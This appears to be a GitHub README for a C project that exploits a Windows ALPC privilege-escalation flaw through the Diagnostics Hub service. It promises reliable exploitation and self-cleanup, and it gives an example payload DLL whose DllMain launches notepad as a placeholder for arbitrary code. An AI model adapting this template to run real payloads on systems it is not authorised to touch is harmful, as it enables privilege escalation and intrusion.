/alpc-diaghub

Utilizing the ALPC Flaw in combiniation with Diagnostics Hub as found in Server 2016 and Windows 10.

Primary LanguageC

About

Project seeks to have a stable / reliable method for ALPC exploit originally disclosed by Sandbox Escaper.

Attempts to clean up itself after loading the DLL.

Screenshots :

Example Payload :

#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved)
{
        switch(dwReason)
        {
                case DLL_PROCESS_ATTACH:
                        WinExec("C:\\Windows\\System32\\notepad.exe", 0);
                        break;
                case DLL_PROCESS_DETACH:
                        break;
                case DLL_THREAD_ATTACH:
                        break;
                case DLL_THREAD_DETACH:
                        break;
        }

        return 0;
}